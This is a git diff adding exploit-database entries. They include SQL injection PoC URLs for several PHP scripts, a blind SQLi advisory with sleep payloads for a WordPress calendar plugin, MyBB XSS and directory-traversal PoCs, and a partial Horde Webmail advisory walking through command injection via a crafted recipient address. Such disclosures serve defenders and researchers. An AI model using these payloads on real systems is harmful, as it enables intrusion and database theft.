--- /dev/null +++ b/platforms/multiple/webapps/41865.html @@ -0,0 +1,73 @@ + + + +

click anywhere

+ + diff --git a/platforms/multiple/webapps/41866.html b/platforms/multiple/webapps/41866.html new file mode 100755 index 000000000..55bec92a9 --- /dev/null +++ b/platforms/multiple/webapps/41866.html @@ -0,0 +1,61 @@ + + + + + + + + + diff --git a/platforms/php/webapps/41856.txt b/platforms/php/webapps/41856.txt new file mode 100755 index 000000000..8cda7a176 --- /dev/null +++ b/platforms/php/webapps/41856.txt @@ -0,0 +1,20 @@ +# # # # # +# Exploit Title: Classified Portal Software 5.1 - SQL Injection +# Google Dork: N/A +# Date: 11.04.2017 +# Vendor Homepage: http://www.myclassifiedscript.com/ +# Software: http://www.myclassifiedscript.com/demo.html +# Demo: http://www.clpage.com/ +# Version: 5.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/search-result.php?keyword=&ad_id=222&cat_level_root=4&cat_level_one=&cat_level_two=&classi_ad_type=[SQL]&sub.x=46&sub.y=8&searchkey=search_record +# http://localhost/[PATH]/search-result.php?keyword=&ad_id=[SQL]&cat_level_root=4&cat_level_one=&cat_level_two=&classi_ad_type=&sub.x=46&sub.y=8&searchkey=search_record +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41857.txt b/platforms/php/webapps/41857.txt new file mode 100755 index 000000000..501d74fa7 --- /dev/null +++ b/platforms/php/webapps/41857.txt @@ -0,0 +1,97 @@ +============================================= +MGC ALERT 2017-003 +- Original release date: April 06, 2017 +- Last revised: April 10, 2017 +- Discovered by: Manuel García Cárdenas +- Severity: 7,1/10 (CVSS Base Score) +============================================= + +I. VULNERABILITY +------------------------- +WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection + +II. BACKGROUND +------------------------- +WordPress event calendar is a FREE user-friendly responsive plugin to +manage multiple recurring events and with various options. + +III. DESCRIPTION +------------------------- +This bug was found using the portal in the files: + +/spider-event-calendar/calendar_functions.php: if +(isset($_POST['order_by'])) { +/spider-event-calendar/widget_Theme_functions.php: if +(isset($_POST['order_by']) && $_POST['order_by'] != '') { + +And when the query is executed, the parameter "order_by" it is not +sanitized: + +/spider-event-calendar/front_end/frontend_functions.php: $rows = +$wpdb->get_results($query." ".$order_by); + +To exploit the vulnerability only is needed use the version 1.0 of the HTTP +protocol to interact with the application. + +It is possible to inject SQL code. + +IV. PROOF OF CONCEPT +------------------------- +The following URL have been confirmed to all suffer from Time Based SQL +Injection. + +Time Based SQL Injection POC: + +POST /wordpress/wp-admin/admin.php?page=SpiderCalendar HTTP/1.1 + +search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(2)))a) +(2 seconds of response) + +search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(30)))a) +(30 seconds of response) + +V. BUSINESS IMPACT +------------------------- +Public defacement, confidential data leakage, and database server +compromise can result from these attacks. Client systems can also be +targeted, and complete compromise of these client systems is also possible. + +VI. SYSTEMS AFFECTED +------------------------- +Spider Event Calendar <= 1.5.51 + +VII. SOLUTION +------------------------- +Vendor release a new version. +https://downloads.wordpress.org/plugin/spider-event-calendar.1.5.52.zip + +VIII. REFERENCES +------------------------- +https://es.wordpress.org/plugins/spider-event-calendar/ + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel García Cárdenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +April 06, 2017 1: Initial release +April 10, 2017 2: Revision to send to lists + +XI. DISCLOSURE TIMELINE +------------------------- +April 06, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas +April 06, 2017 2: Send to vendor +April 07, 2017 3: Vendor fix the vulnerability and release a new version +April 10, 2017 4: Send to the Full-Disclosure lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/platforms/php/webapps/41858.txt b/platforms/php/webapps/41858.txt new file mode 100755 index 000000000..a1004d25a --- /dev/null +++ b/platforms/php/webapps/41858.txt @@ -0,0 +1,23 @@ +# # # # # +# Exploit Title: Social Directory Script 2.0 - SQL Injection +# Google Dork: N/A +# Date: 11.04.2017 +# Vendor Homepage: http://www.phponly.com/ +# Software: http://www.phponly.com/Social-Directory.html +# Demo: http://www.phponly.com/demo/link/ +# Version: 2.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?subcategory=[SQL] +# http://localhost/[PATH]/searchtopic.php?search=[SQL] +# http://localhost/[PATH]/index.php?category=[SQL] +# phponly_link_admin:id +# phponly_link_admin:username +# phponly_link_admin:password +# # # # # diff --git a/platforms/php/webapps/41859.txt b/platforms/php/webapps/41859.txt new file mode 100755 index 000000000..b975f02f0 --- /dev/null +++ b/platforms/php/webapps/41859.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: FAQ Script 3.1.3 - SQL Injection +# Google Dork: N/A +# Date: 11.04.2017 +# Vendor Homepage: http://www.phponly.com/ +# Software: http://www.phponly.com/faq.html +# Demo: http://www.phponly.com/demo/faq/ +# Version: 3.1.3 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/home/categorySearch?category_id=[SQL] +# # # # # diff --git a/platforms/php/webapps/41860.txt b/platforms/php/webapps/41860.txt new file mode 100755 index 000000000..4c72553e7 --- /dev/null +++ b/platforms/php/webapps/41860.txt @@ -0,0 +1,29 @@ +Description: +============ + +product:MyBB +Homepage:https://mybb.com/ +vulnerable version:<1.8.11 +Severity:High risk + +=============== + +Proof of Concept: +============= + +1.post a thread or reply any thread ,write: + +[email=2"onmouseover="alert(document.location)]hover me[/email] + +then when user’s mouse hover it,XSS attack will occur! + +============ + +Fixed: +============ + +This vulnerability was fixed in version 1.8.11 + +https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/ + +============= \ No newline at end of file diff --git a/platforms/php/webapps/41862.txt b/platforms/php/webapps/41862.txt new file mode 100755 index 000000000..7c36ff026 --- /dev/null +++ b/platforms/php/webapps/41862.txt @@ -0,0 +1,35 @@ +Description: +============ + +product: MyBB +Homepage: https://mybb.com/ +vulnerable version: < 1.8.11 +Severity: Low risk + +=============== + +Proof of Concept: +============= + +vulnerability address:http://127.0.0.1/mybb_1810/Upload/admin/index.php?module=config-smilies&action=add_multiple + +vulnerability file directory:/webroot/mybb_1810/Upload/admin/modules/config/smilies.php + +vulnerability Code: + +Line 326 $path = $mybb->input['pathfolder']; + +Line 327 $dir = @opendir(MYBB_ROOT.$path); + +if we input "pathfolder" to "../../bypass/smile",Directory Traversal success! + +============ + +Fixed: +============ + +This vulnerability was fixed in version 1.8.11 + +https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/ + +============= \ No newline at end of file diff --git a/platforms/php/webapps/41864.txt b/platforms/php/webapps/41864.txt new file mode 100755 index 000000000..5abe32bc2 --- /dev/null +++ b/platforms/php/webapps/41864.txt @@ -0,0 +1,865 @@ +Source: https://blogs.securiteam.com/index.php/archives/3107 + +Vulnerabilities Summary +The following advisory describes two (2) vulnerabilities found in +Horde Groupware Webmail. + +Horde Groupware Webmail Edition is a free, enterprise ready, browser +based communication suite. Users can read, send and organize email +messages and manage and share calendars, contacts, tasks, notes, +files, and bookmarks with the standards compliant components from the +Horde Project. Horde Groupware Webmail Edition bundles the separately +available applications IMP, Ingo, Kronolith, Turba, Nag, Mnemo, +Gollem, and Trean. + +It can be extended with any of the released Horde applications or the +applications that are still in development, like a bookmark manager or +a file manager. + +Affected versions: Horde 5, 4 and 3 + +The vulnerabilities found in Horde Groupware Webmail are: + +Authentication Remote Code Execution +Unauthentication Remote Code Execution + +Credit +An independent security researcher has reported this vulnerability to +Beyond Security’s SecuriTeam Secure Disclosure program. + +Vendor response +Horde has released a patch to address the vulnerabilities. + +For more information: +https://lists.horde.org/archives/horde/Week-of-Mon-20170403/056767.html + +Vulnerabilities Details + +Authentication Remote Code Execution +Horde Webmail contains a vulnerability that allows a remote attacker +to execute arbitrary code with the privileges of the user who runs the +web server. + +For successful attack GnuPG feature should be enabled on the target +server (path to gpg binary should be defined in $conf[gnupg][path] +setting). + +Vulnerable code: encryptMessage() function of GPG feature. + +Path: /Horde/Crypt/Pgp/Backend/Binary.php: + +/* 416 */ public function encryptMessage($text, $params) +/* 417 */ { +/* … */ +/* 435 */ foreach (array_keys($params['recips']) as $val) { +/* 436 */ $cmdline[] = '--recipient ' . $val; +#! vulnerable code +/* … */ +/* 444 */ /* Encrypt the document. */ +/* 445 */ $result = $this->_callGpg( +/* 446 */ $cmdline, +/* 447 */ 'w', +/* 448 */ empty($params['symmetric']) ? null : $params['passphrase'], +/* 449 */ true, +/* 450 */ true +/* 451 */ ); + +$params[‘recips’] will be added to $cmdline array and passed to _callGpg(): + +Path: /Horde/Crypt/Pgp/Backend/Binary.php: + +/* 642 */ public function _callGpg( +/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false, +/* 644 */ $parseable = false, $verbose = false +/* 645 */ ) +/* 646 */ { +/* … */ +/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options)); +/* … */ +/* 681 */ if ($mode == 'w') { +/* 682 */ if ($fp = popen($cmdline, 'w')) { #! +vulnerable code +/* … */ + +We can see that our recipients (addresses) will be in command line +that is going to be executed. encryptMessage() function can be reached +by various API, requests. For example it will be called when user try +to send encrypted message. + +Our request for encryption and sending our message will be processed +by buildAndSendMessage() method: +Path: /imp/lib/Compose.php + +/* 733 */ public function buildAndSendMessage( +/* 734 */ $body, $header, IMP_Prefs_Identity $identity, array $opts = array() +/* 735 */ ) +/* 736 */ { +/* 737 */ global $conf, $injector, $notification, $prefs, $registry, $session; +/* 738 */ +/* 739 */ /* We need at least one recipient & RFC 2822 requires that no 8-bit +/* 740 */ * characters can be in the address fields. */ +/* 741 */ $recip = $this->recipientList($header); +/* ... */ +/* 793 */ /* Must encrypt & send the message one recipient at a time. */ +/* 794 */ if ($prefs->getValue('use_smime') && +/* 795 */ in_array($encrypt, array(IMP_Crypt_Smime::ENCRYPT, +IMP_Crypt_Smime::SIGNENC))) { +/* ... */ +/* 807 */ } else { +/* 808 */ /* Can send in clear-text all at once, or PGP can encrypt +/* 809 */ * multiple addresses in the same message. */ +/* 810 */ $msg_options['from'] = $from; +/* 811 */ $save_msg = $this->_createMimeMessage($recip['list'], $body, +$msg_options); #! vulnerable code + +In line 741 it tries to create recipient list: Horde parsers values of +‘to’, ‘cc’, ‘bcc’ headers and creates list of Rfc822 addresses. In +general there are restrictions for characters in addresses but if we +will use the next format: + +display-name <"somemailbox"@somedomain.com> + +somemailbox will be parsed by _rfc822ParseQuotedString() method: + +Path: /Horde/Mail/Rfc822.php: + +/* 557 */ protected function _rfc822ParseQuotedString(&$str) +/* 558 */ { +/* 559 */ if ($this->_curr(true) != '"') { +/* 560 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.'); +/* 561 */ } +/* 563 */ while (($chr = $this->_curr(true)) !== false) { +/* 564 */ switch ($chr) { +/* 565 */ case '"': +/* 566 */ $this->_rfc822SkipLwsp(); +/* 567 */ return; +/* 569 */ case "\n": +/* 570 */ /* Folding whitespace, remove the (CR)LF. */ +/* 571 */ if (substr($str, -1) == "\r") { +/* 572 */ $str = substr($str, 0, -1); +/* 573 */ } +/* 574 */ continue; +/* 576 */ case '\\': +/* 577 */ if (($chr = $this->_curr(true)) === false) { +/* 578 */ break 2; +/* 579 */ } +/* 580 */ break; +/* 581 */ } +/* 583 */ $str .= $chr; +/* 584 */ } +/* 586 */ /* Missing trailing '"', or partial quoted character. */ +/* 587 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.'); +/* 588 */ } + +There are only a few limitations: + +we cannot use “ +\n will be deleted +we cannot use \ at the end of our mailbox + +After creation of recipient list buildAndSendMessage() will call +_createMimeMessage(): + +Path: /imp/lib/Compose.php + +/* 1446 */ protected function _createMimeMessage( +/* 1447 */ Horde_Mail_Rfc822_List $to, $body, array $options = array() +/* 1448 */ ) +/* 1449 */ { +/* 1450 */ global $conf, $injector, $prefs, $registry; +/* ... */ +/* 1691 */ /* Set up the base message now. */ +/* 1692 */ $encrypt = empty($options['encrypt']) +/* 1693 */ ? IMP::ENCRYPT_NONE +/* 1694 */ : $options['encrypt']; +/* 1695 */ if ($prefs->getValue('use_pgp') && +/* 1696 */ !empty($conf['gnupg']['path']) && +/* 1697 */ in_array($encrypt, array(IMP_Crypt_Pgp::ENCRYPT, +IMP_Crypt_Pgp::SIGN, IMP_Crypt_Pgp::SIGNENC, +IMP_Crypt_Pgp::SYM_ENCRYPT, IMP_Crypt_Pgp::SYM_SIGNENC))) { +/* 1698 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp'); +/* ... */ +/* 1727 */ /* Do the encryption/signing requested. */ +/* 1728 */ try { +/* 1729 */ switch ($encrypt) { +/* ... */ +/* 1735 */ case IMP_Crypt_Pgp::ENCRYPT: +/* 1736 */ case IMP_Crypt_Pgp::SYM_ENCRYPT: +/* 1737 */ $to_list = clone $to; +/* 1738 */ if (count($options['from'])) { +/* 1739 */ $to_list->add($options['from']); +/* 1740 */ } +/* 1741 */ $base = $imp_pgp->IMPencryptMIMEPart($base, $to_list, +($encrypt == IMP_Crypt_Pgp::SYM_ENCRYPT) ? +$symmetric_passphrase : null); +/* 1742 */ break; + +Here we can see validation (1695-1696 lines) that: + +Current user has enabled “use_pgp” feature in his preferences (it is +not a problem as an attacker can edit his own preferences) +$conf[‘gnupg’][‘path’] is not empty. This value can be edited only by +admin. So if we don’t have value here our server is not vulnerable. +But if admin wants to allow users to use GPG feature he/she needs to +define value for this config. + +Also we can see that in lines 1737-1739 to our recipient list will be +added address “from” as well. + +Path: /imp/lib/Crypt/Pgp.php + +/* 584 */ public function impEncryptMimePart($mime_part, +/* 585 */ Horde_Mail_Rfc822_List $addresses, +/* 586 */ $symmetric = null) +/* 587 */ { +/* 588 */ return $this->encryptMimePart($mime_part, +$this->_encryptParameters($addresses, $symmetric)); +/* 589 */ } + +Before encryptMimePart() call Horde uses _encryptParameters() + +Path: /imp/lib/Crypt/Pgp.php + +/* 536 */ protected function _encryptParameters(Horde_Mail_Rfc822_List +$addresses, +/* 537 */ $symmetric) +/* 538 */ { +/* ... */ +/* 546 */ $addr_list = array(); +/* 548 */ foreach ($addresses as $val) { +/* 549 */ /* Get the public key for the address. */ +/* 550 */ $bare_addr = $val->bare_address; +/* 551 */ $addr_list[$bare_addr] = $this->getPublicKey($bare_addr); +/* 552 */ } +/* 554 */ return array('recips' => $addr_list); +/* 555 */ } + +Horde will add to each address its Public Key. There a few source of +Public Keys: + +AddressBook (we will use this source) +Servers with Public Keys + +Note that Horde should be able to find Public Key for our “From” +address as well. +We can generate pair of PGP keys (https is required) or we can use the +same trick with AddressBook (we can create some contact, add any valid +Public PGP key, and add this address to default identity) +encryptMimePart() will call encrypt() method + +Path: /Horde/Crypt/Pgp.php + +/* 773 */ public function encryptMIMEPart($mime_part, $params = array()) +/* 774 */ { +/* 775 */ $params = array_merge($params, array('type' => 'message')); +/* … */ +/* 781 */ $message_encrypt = $this->encrypt($signenc_body, $params); + +It will call encryptMessage() + +Path: /Horde/Crypt/Pgp.php + +/* 554 */ public function encrypt($text, $params = array()) +/* 555 */ { +/* 556 */ switch (isset($params['type']) ? $params['type'] : false) { +/* 557 */ case 'message': +/* 558 */ $error = Horde_Crypt_Translation::t( +/* 559 */ "Could not PGP encrypt message." +/* 560 */ ); +/* 561 */ $func = 'encryptMessage'; +/* 562 */ break; +/* ... */ +/* 586 */ $this->_initDrivers(); +/* 587 */ +/* 588 */ foreach ($this->_backends as $val) { +/* 589 */ try { +/* 590 */ return $val->$func($text, $params); +/* 591 */ } catch (Horde_Crypt_Exception $e) {} +/* 592 */ } + +In conclusions: +If Horde server has enabled “GnuPG feature” any unprivileged user is +able to execute arbitrary code. + +Enable GPG feature for attacker account (“Enable PGP functionality?” +checkbox on “PGP Configure PGP encryption support.” section in +Prefferences->Mail page ) +Create some contact in the attacker AddressBook, add any valid Public +PGP key, and add this address to default identity +Create another contact in the attacker AddressBook, add any valid +Public PGP key, and change email address to some$(desired command to +execute) contact@somedomain.com +Create a new message to some$(desired command to execute) contact@somedomain.com +Choose Encryption:PGP Encrypt Message option +Click Send button + +And desired command will be executed on the Horde server. + +Proof of Concept – Authenticated Code Execution + +For Proof of Concept we can use preconfigured image of Horde server +from Bitnami (Bitnami – “Easy to use cloud images, containers, and VMs +that work on any platform”): + +https://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova + +Step 1 – Login as admin (by default user:bitnami) and go to +Administration -> Configuration and choose Horde (horde). Open GnuPG +tab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click +“Generate Horde Configuration“: + +Now we have enabled GPG feature on our server and we can login as +regular user and try to execute desired commands. But Bitnami image +does not have installed and configured Mail server so we need to use +external one or install it on local machine. + +We will use gmail account (to be able to login to it from Horde I had +to change Gmail account setting Allow less secure apps: ON). + +To use external Mail server we need to change the next setting: +“Administrator Panel” -> “Configuration” -> “Horde” -> +“Authentication” + +Step 2 – Configure Horde web-mail authentication ($conf[auth][driver]) +to “Let a Horde application handle authentication” and click “Generate +Horde Configuration”: + +Step 3 – logout and login with your gmail account. Currently we are +login as regular user so we can try to execute desired commands: + +Go to Preferences -> Mail and click on PGP link. Check Enable PGP +functionality? checkbox and click “Save”: + +Create “from” contact in our AddressBook: “Address Book -> New Contact +-> in Address Book of …” + +Personal tab – Last Name: mymailboxwithPGPkey +Communication tab – Email: mymailboxwihPGP@any.com +Other tab – PGP Public Key: any valid Public PGP key. + +For example: + +-----BEGIN PGP PUBLIC KEY BLOCK----- +Version: SKS 1.1.6 +Comment: Hostname: keyserver.ubuntu.com +mQGiBDk89iARBADhB7AyHQ/ZBlZjRRp1/911XaXGGmq1LDLTUTCAbJyQ1TzKDdetfT9Szk01 +YPdAnovgzxTS89svuVHP/BiqLqhJMl2FfMLcJX+va+DujGuLDCZDHi+4czc33N3z8ArpxzPQ +5bfALrpNMJi6v2gZkDQAjMoeKrNEfXLCXQbTYWCuhwCgnZZCThya4xhmlLCTkwsQdMjFoj8D +/iOIP/6W27opMJgZqTHcisFPF6Kqyxe6GAftJo6ZtLEG26k2Qn3O0pghDz2Ql4aDVki3ms82 +z77raSqbZVJzAFPzYoIKuc3JOoxxE+SelzSzj4LuQRXYKqZzT8/qYBCLg9cmhdm8PnwE9fd/ +POGnNQFMk0i2xSz0FMr9R1emIKNsA/454RHIZ39ebvZzVULS1pSo6cI7DAJFQ3ejJqEEdAbr +72CW3eFUAdF+4bJQU/V69Nr+CmziBbyqKP6HfiUH9u8NLrYuK6XWXLVVSCBPsOxHxhw48hch +zVxJZ5Cyo/tMSOY/CxvLL/vMoT2+kQX1SCsWALosKJyOGbpCJmPasOLKdrQnQWxpY2UgKFJl +Y2h0c2Fud8OkbHRpbikgPGFsaWNlQGN5Yi5vcmc+iEYEEBECAAYFAjk+IEgACgkQzDSD4hsI +fQSaWQCgiDvvnRxa8XFOKy/NI7CKL5X4D28An2k9Cbh+dosXvB5zGCuQiAkLiQ+CiEYEEREC +AAYFAkKTPFcACgkQCY+3LE2/Ce4l+gCdFSHqp5HQCMKSOkLodepoG0FiQuwAnR2nioCQ3A5k +YI0NfUth+0QzJs1ciFYEExECABYFAjk89iAECwoEAwMVAwIDFgIBAheAAAoJEFsqCm37V5ep +fpAAoJezEplLlaGQHM8ppKReVHSyGuX+AKCYwRcwJJwoQHM8p86xhSuC/opYPoheBBMRAgAW +BQI5PPYgBAsKBAMDFQMCAxYCAQIXgAASCRBbKgpt+1eXqQdlR1BHAAEBfpAAoJezEplLlaGQ +HM8ppKReVHSyGuX+AKCYwRcwJJwoQHM8p86xhSuC/opYPrkBDQQ5PPYqEAQArSW27DriJAFs +Or+fnb3VwsYvznFfEv8NJyM/9/lDYfIROHIhdKCWswUWCgoz813RO2taJi5p8faM048Vczu/ +VefTzVrsvpgXUIPQoXjgnbo6UCNuLqGk6TnwdJPPNLuIZLBEhGdA+URtFOA5tSj67h0G4fo0 +P8xmsUXNgWVxX/MAAwUD/jUPLFgQ4ThcuUpxCkjMz+Pix0o37tOrFOU/H0cn9SHzCQKxn+iC +sqZlCsR+qXNDl43vSa6Riv/aHtrD+MJLgdIVkufuBWOogtuojusnFGY73xvvM1MfbG+QaUqw +gfe4UYOchLBNVtfN3WiqSPq5Yhue4m1u/xIvGGJQXvSBxNQyiEYEGBECAAYFAjk89ioACgkQ +WyoKbftXl6kV5QCfV7GjnmicwJPgxUQbDMP9u5KuVcsAn3aSmYyI1u6RRlKoThh0WEHayISv +iE4EGBECAAYFAjk89ioAEgkQWyoKbftXl6kHZUdQRwABARXlAJ9XsaOeaJzAk+DFRBsMw/27 +kq5VywCfdpKZjIjW7pFGUqhOGHRYQdrIhK8= +=RHjX +-----END PGP PUBLIC KEY BLOCK----- + +Click “Add” button: + +Go to Preferences -> Global Preferences and click on Personal +Information link. Put mymailboxwihPGP@any.com into field The default +e-mail address to use with this identity and Click “Save”: + +Create our “to” contact in our AddressBook: “Address Book -> New +Contact -> in Address Book of …” + +Personal tab – Last Name: contact_for_attack +Communication tab – Email: hereinj@any.com +Other tab – PGP Public Key: any valid Public PGP key (it can be the +same as in the previous step) +And click “Add” button: + +Inject our command: Click on Edit. Go to Communication Tab, put cursor +in Email field and chose “Inspect Element (Q)” from context menu: + +Delete “email” from the type argument and close Inspector: + +1 + + +Edit the address as we want – for example hereinj$(touch +/tmp/hereisvuln)@any.com and click “Save”: + +Create a new message ( Mail -> New Message) with our contact as recipient: + +Choose PGP Encrypt Message in Encryption option: + +Enter any subject and any content. Click “Send” + +We will get “PGP Error:…” + +It is ok – let’s check our server: + +We have a new file “hereisvuln” so our command was executed. + +Unauthentication Remote Code Execution +Horde Webmail contains a vulnerability that allows a remote attacker +to execute arbitrary code with the privileges of the user who runs the +web server. + +Vulnerable code: decryptSignature() function of GPG feature. + +Path: /Horde/Crypt/Pgp/Backend/Binary.php: + +/* 539 */ public function decryptSignature($text, $params) +/* 540 */ { +/* ... */ +/* 550 */ /* Options for the GPG binary. */ +/* 551 */ $cmdline = array( +/* 552 */ '--armor', +/* 553 */ '--always-trust', +/* 554 */ '--batch', +/* 555 */ '--charset ' . (isset($params['charset']) ? +$params['charset'] : 'UTF-8'), +/* 556 */ $keyring, +/* 557 */ '--verify' +/* 558 */ ); +/* ... */ +/* 571 */ $result = $this->_callGpg($cmdline, 'r', null, true, true, true); +/* ... */ + +$params[‘charset’] will be added to $cmdline array and passed to _callGpg(): + +/* 642 */ public function _callGpg( +/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false, +/* 644 */ $parseable = false, $verbose = false +/* 645 */ ) +/* 646 */ { +/* … */ +/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options)); +/* … */ +/* 681 */ if ($mode == 'w') { +/* … */ +/* 704 */ } elseif ($mode == 'r') { +/* 705 */ if ($fp = popen($cmdline, 'r')) { +/* … */ + +Our $params[‘charset’] will be in command line that is going to be executed. + +decryptSignature() is called from decrypt() method: + +Path – /Horde/Crypt/Pgp.php: + +/* 611 */ public function decrypt($text, $params = array()) +/* 612 */ { +/* 613 */ switch (isset($params['type']) ? $params['type'] : false) { +/* 614 */ case 'detached-signature': +/* 615 */ case 'signature': +/* 616 */ /* Check for required parameters. */ +/* 617 */ if (!isset($params['pubkey'])) { +/* 618 */ throw new InvalidArgumentException( +/* 619 */ 'A public PGP key is required to verify a signed message.' +/* 620 */ ); +/* 621 */ } +/* 622 */ if (($params['type'] === 'detached-signature') && +/* 623 */ !isset($params['signature'])) { +/* 624 */ throw new InvalidArgumentException( +/* 625 */ 'The detached PGP signature block is required to verify the +signed message.' +/* 626 */ ); +/* 627 */ } +/* 628 */ +/* 629 */ $func = 'decryptSignature'; +/* 630 */ break; +/* ... */ +/* 650 */ $this->_initDrivers(); +/* 651 */ +/* 652 */ foreach ($this->_backends as $val) { +/* 653 */ try { +/* 654 */ return $val->$func($text, $params); +/* 655 */ } catch (Horde_Crypt_Exception $e) {} +/* 656 */ } +/* ... */ + +decrypt() with needed parameters is used in verifySignature(): + +Path – /imp/lib/Crypt/Pgp.php + +/* 339 */ public function verifySignature($text, $address, $signature = '', +/* 340 */ $charset = null) +/* 341 */ { +/* 342 */ if (!empty($signature)) { +/* 343 */ $packet_info = $this->pgpPacketInformation($signature); +/* 344 */ if (isset($packet_info['keyid'])) { +/* 345 */ $keyid = $packet_info['keyid']; +/* 346 */ } +/* 347 */ } +/* 349 */ if (!isset($keyid)) { +/* 350 */ $keyid = $this->getSignersKeyID($text); +/* 351 */ } +/* 353 */ /* Get key ID of key. */ +/* 354 */ $public_key = $this->getPublicKey($address, array('keyid' => $keyid)); +/* 356 */ if (empty($signature)) { +/* 357 */ $options = array('type' => 'signature'); +/* 358 */ } else { +/* 359 */ $options = array('type' => 'detached-signature', 'signature' +=> $signature); +/* 360 */ } +/* 361 */ $options['pubkey'] = $public_key; +/* 363 */ if (!empty($charset)) { +/* 364 */ $options['charset'] = $charset; +/* 365 */ } +/* 369 */ return $this->decrypt($text, $options); +/* 370 */ } + +verifySignature() is called from _outputPGPSigned(): + +Path – /imp/lib/Mime/Viewer/Pgp.php + +/* 387 */ protected function _outputPGPSigned() +/* 388 */ { +/* 389 */ global $conf, $injector, $prefs, $registry, $session; +/* 390 */ +/* 391 */ $partlist = array_keys($this->_mimepart->contentTypeMap()); +/* 392 */ $base_id = reset($partlist); +/* 393 */ $signed_id = next($partlist); +/* 394 */ $sig_id = Horde_Mime::mimeIdArithmetic($signed_id, 'next'); +/* 395 */ +/* 396 */ if (!$prefs->getValue('use_pgp') || empty($conf['gnupg']['path'])) { +/* 397 */ return array( +/* 398 */ $sig_id => null +/* 399 */ ); +/* 400 */ } +/* ... */ +/* 417 */ if ($prefs->getValue('pgp_verify') || +/* 418 */ $injector->getInstance('Horde_Variables')->pgp_verify_msg) { +/* 419 */ $imp_contents = $this->getConfigParam('imp_contents'); +/* 420 */ $sig_part = $imp_contents->getMIMEPart($sig_id); +/* ... */ +/* 433 */ try { +/* 434 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp'); +/* 435 */ if ($sig_raw = +$sig_part->getMetadata(Horde_Crypt_Pgp_Parse::SIG_RAW)) { +/* 436 */ $sig_result = $imp_pgp->verifySignature($sig_raw, +$this->_getSender()->bare_address, null, $sig_part- +> getMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET)); +/* ... */ + +And it is used in _renderInline(): + +Path – /imp/lib/Mime/Viewer/Pgp.php + +/* 134 */ protected function _renderInline() +/* 135 */ { +/* 136 */ $id = $this->_mimepart->getMimeId(); +/* 138 */ switch ($this->_mimepart->getType()) { +/* ... */ +/* 142 */ case 'multipart/signed': +/* 143 */ return $this->_outputPGPSigned(); + +Let’s go back to _outputPGPSigned() method. We can see a few +requirements before the needed call: + +$conf[‘gnupg’][‘path’] should be not empty. This value can be edited +only by admin(if he/she wants to allow users to use GPG feature he/she +needs to define value for this config). +Current user has enabled “use_pgp” feature in his preferences +Current user has enabled “pgp_verify” feature in his preferences +Current user has enabled “pgp_verify” feature in his preferences + +Also we see that our charset value is taken from $sig_part -> +getMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET) + +Our value will be stored during parsing of PGP parts: + +Path – /Horde/Crypt/Pgp/Parse.php + +/* 150 */ public function parseToPart($text, $charset = 'UTF-8') +/* 151 */ { +/* 152 */ $parts = $this->parse($text); +/* ... */ +/* 162 */ while (list(,$val) = each($parts)) { +/* 163 */ switch ($val['type']) { +/* ... */ +/* 200 */ case self::ARMOR_SIGNED_MESSAGE: +/* 201 */ if ((list(,$sig) = each($parts)) && +/* 202 */ ($sig['type'] == self::ARMOR_SIGNATURE)) { +/* 203 */ $part = new Horde_Mime_Part(); +/* 204 */ $part->setType('multipart/signed'); +/* 205 */ // TODO: add micalg parameter +/* 206 */ $part->setContentTypeParameter('protocol', +'application/pgp-signature'); +/* 207 */ +/* 208 */ $part1 = new Horde_Mime_Part(); +/* 209 */ $part1->setType('text/plain'); +/* 210 */ $part1->setCharset($charset); +/* 211 */ +/* 212 */ $part1_data = implode("\n", $val['data']); +/* 213 */ $part1->setContents(substr($part1_data, strpos($part1_data, +"\n\n") + 2)); +/* 214 */ +/* 215 */ $part2 = new Horde_Mime_Part(); +/* 216 */ +/* 217 */ $part2->setType('application/pgp-signature'); +/* 218 */ $part2->setContents(implode("\n", $sig['data'])); +/* 219 */ +/* 220 */ $part2->setMetadata(self::SIG_CHARSET, $charset); +/* 221 */ 